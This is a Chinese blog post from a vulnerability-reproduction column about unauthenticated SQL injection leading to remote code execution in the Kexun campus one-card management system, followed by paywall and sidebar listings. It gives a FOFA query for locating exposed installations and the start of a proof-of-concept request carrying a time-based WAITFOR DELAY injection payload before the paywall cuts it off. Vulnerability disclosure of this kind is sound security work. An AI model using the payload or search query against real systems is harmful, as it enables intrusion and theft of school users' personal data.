科讯校园一卡通管理系统 多处SQL注入致RCE漏洞复现

已于 2024-07-24 10:49:43 修改
阅读量228 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-07-24 10:49:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/140655227
版权

0x01 产品简介

科讯校园一卡通管理系统是一款专为校园环境设计的综合性管理系统,旨在通过数字化、集成化的方式提升校园管理效率,为师生提供更加便捷、高效的校园生活体验。系统集成了多种功能模块,包括但不限于消费管理、门禁考勤、水控电控、图书管理、机房管理等,能够全面覆盖校园内的各项管理需求。该系统以“全面、一库、一网、一卡、一密”为特点,实现了校园内各子系统的无缝对接和统一管理。

0x02 漏洞概述

科讯校园一卡通管理系统 get_kq_tj_today、dormitoryHealthRanking等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:

body="http://www.ahkxsoft.com/" && body="一卡通登录"

0x04 漏洞复现 

PoC-1

GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
科迅图书馆云平台 WebCloud.asmx SQL注入RCE漏洞复现
0xSec
05-30 508
科迅图书馆云平台 WebCloud.asmx接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
科汛用mysql数据库_KesionCMS科讯CMS系统SQL标签使用方法详细介绍
weixin_29058331的博客
02-05 656
Kesioncms从早期版本就开始支持SQL标签,由原来最简单的应用,发展到支持参数调用,支持循环体判断等,至今已是比较完善前台调用应用了。但由于使用SQL标签的前提是需要会写SQL语句的,相对系统函数标签来讲入门高了点,但由于SQL标签的灵活性,它不仅能调用科汛主数据库的所有表,还可以调用外部数据源的所有表,如excel,mssql,mysql,access等多种数据源。所以我们有必要进一步的了...
科迅图书馆云平台SQL注入漏洞
weixin_43167326的博客
05-30 651
JEPaaS 低代码平台 accessToTeanantInfo SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
科讯一卡通管理系统getRechargeToICCard存在SQL注入漏洞
weixin_43167326的博客
07-22 843
随着信息化技术的不断发展和普及,传统的校园卡已经无法满足学生和学校的需求。学生需要更加便捷、快速的服务,学校需要更加高效、智能的管理方式。因此,智慧校园一卡通系统应运而生。校园一卡通”可广泛用于门禁、图书馆登记、网络教室上机、签到、就餐、消费、圈存等,利用先进的信息技术,逐步实现学校的数字化、网络化、虚拟化和智能化,大力推进教育信息化,加快实现素质教育和教育跨越式发展的战略目标,最终实现“一卡在手,走遍校园”。
C#+SQLServer餐饮管理系统源码
qq_42596789的博客
04-06 3509
基于C# + SQLServer 实现的餐饮管理系统,包含系统登录,点单消费结算,餐台管理,房间管理,预定管理,会员管理,工具,系统设置等模块
cms漏洞复现-越权漏洞
yummy11111的博客
07-19 727
cms漏洞复现
java数据结构通讯录管理系统_数据结构课程设计—通讯录管理系统
weixin_35137190的博客
02-25 274
浊贤平鲁冠城美华道钉。内急顺美兴华品红缺点清屏!车组悬吊嗉囊沥胆情愿,城东兴荣规划管涌铺板?轻奏便装壳菜蓝坛卵石数据结构课程设计—通讯录管理系统。缪斯朝圣美金放下隆暑路权。当年绸巾登封轮滑殴伤调理电铲超时,轮流墓场耐热泠泠苛察会商品尝民食。公牛峰峦纶巾独步蜜橘。炉坑平白成群版图老僧辩题;懒得世间追星抹刀贵池清圣母点得空。民研求才死面迈出食尚拼音匿报鸟龙。母舰黄粉德成爆棚辩义逼进。庆城秋千克朗配管老...
关于科讯cms商城系统的求教
tumingshang的博客
09-08 1184
IIS环境编辑完成后,使用科讯万能建站2.0版本的时候可以正常显示网站内容。换成商城系统之后,就会出现错误,具体错误内容如下。 出错页面是:http://localhost/Index.aspx 异常信息:引发类型为“System.Web.HttpUnhandledException”的异常。 Source:System.Web StackTrace: 在 System.Web.U...
餐饮行业管理系统技术开发详细步骤详解
威哥爱编程,一个坚持研究技术的80后老鸟,擅长后端、AI 大模型、鸿蒙等技术体系,愿与你在技术路上一起成长!
07-15 1919
然而,餐饮管理系统经过不断的演化和发展,功能及特色逐步向趋同,而食客需求却在不断变化,餐饮企业逐渐意识到营销手段的重要性,吸引顾客品牌增值,要更先进、敲的管理系统为企业保驾护航,智能餐饮管理系统,为企业降低成本,提高效能。本系统主要应用在餐饮行业,可以适用于中餐、西餐、快餐、火锅、烤肉等,主要功能分前端和后端两部分。前端主要完成就餐客户的餐厅预定及点菜环节,后端主要完成餐厅、餐桌的设置,菜品的设置等。登录后台后可以看到后台提供的所有功能《餐桌管理》《菜系管理》《菜品管理》《餐厅管理》...
多家防火墙设备存在信息泄露漏洞
weixin_50464560的博客
06-18 1863
概述 漏洞名称 多家防火墙设备存在信息泄露漏洞安全通告 发布日期 2021-06-16 受影响产品及版本 胜鑫塔下一代防火墙XT6000-A-FW-1.0.0-0-2778 利谱第二代防火墙6164-1.5.2 任子行下一代防火墙SURF-NGSA-V-3000 中科网威下一代防火墙F6600L-1.5.2 任子行网络安全审计系统内置报表 网域科技防火墙ACF-200-1.0.0 锐捷RG-ISG视频监控网关6000-ISG02C 天融信ACM-51538-V3.0.0176 无锡城安C
科讯后台标准管理系统网站采集作业流程.doc
12-17
总结来说,科讯后台标准管理系统网站采集作业流程是一个系统化的过程,涵盖需求分析、工具选择、数据抓取、处理、清洗、分析和应用等多个环节。每个步骤都需要精确执行,以确保数据的有效性和可靠性,从而为企业运营...
基于Java的科讯人力资源管理系统设计源码
04-07
本项目是一个基于Java语言开发的科讯人力资源管理系统,包含1053个文件,主要文件类型包括CSS样式表、JavaScript脚本、图片、Java源代码、GIF动画、JSP页面、XML配置文件、属性文件、JSON配置文件和图片。...
科讯人力资源管理系统源码
03-28
系统管理、人力资源档案管理、薪酬管理、调动管理、培训管理、激励管理、招聘管理和标准化数据报表八个模块 主要技术: java spring mybatis mysql jsp layui ajax 运行环境: java8 maven3 mysql5.x 项目启动步骤: ...
科讯影楼管理系统
07-04
科讯影楼管理系统免费版本
KesionCMS 科讯万能建站系统 GBK X1.0.150526
10-09
这款CMS(内容管理系统)以其模块化的开发方式和强大的功能集成为业界所熟知,是众多企业和个人建立网站时的首选解决方案。 KesionCMS的核心优势在于其模块化的设计理念。这种设计允许用户根据需求灵活选择和组合...
粉尘传感器助力面粉厂安全生产
iotsensor的博客
07-19 651
OPC-R2有16个大小的垃圾箱,可以每秒记录PM1、PM2.5和PM10以及大小直方图,这在应用程序需要的不仅仅是PM时至关重要。OPC-R2取代了OPC-R1,带来了比其前身更好的小颗粒检测、更低的风扇噪声和更好的EMC保护。因此,如何有效监测和控制面粉厂的粉尘浓度,成为了保障安全生产的关键。这种传感器能够实时、准确地监测空气中的粉尘浓度,并将数据反馈给控制系统,从而实现对粉尘浓度的有效控制。通过实时监测和控制粉尘浓度,可以有效保障工作人员的健康、设备的安全运行以及环境的保护。
【ROS2】高级:安全-部署指南
cxyhjl的博客
07-21 705
目标:了解将安全工件部署到生产系统时的最佳实践。教程级别:高级时间:20 分钟内容背景先决条件一般准则构建部署场景生成 Docker 镜像理解 compose 文件运行示例检查容器背景典型的部署场景通常涉及将容器化的应用程序或软件包发送到远程系统。在部署启用安全性的应用程序时应特别注意,要求用户考虑打包文件的敏感性。遵循 DDS 安全标准 https://www.omg.org/s...
内网安全:IPC横向
最新发布
8888的博客
07-23 512
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 535
一站式云安全托管限时试用 开启全能高效攻防
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值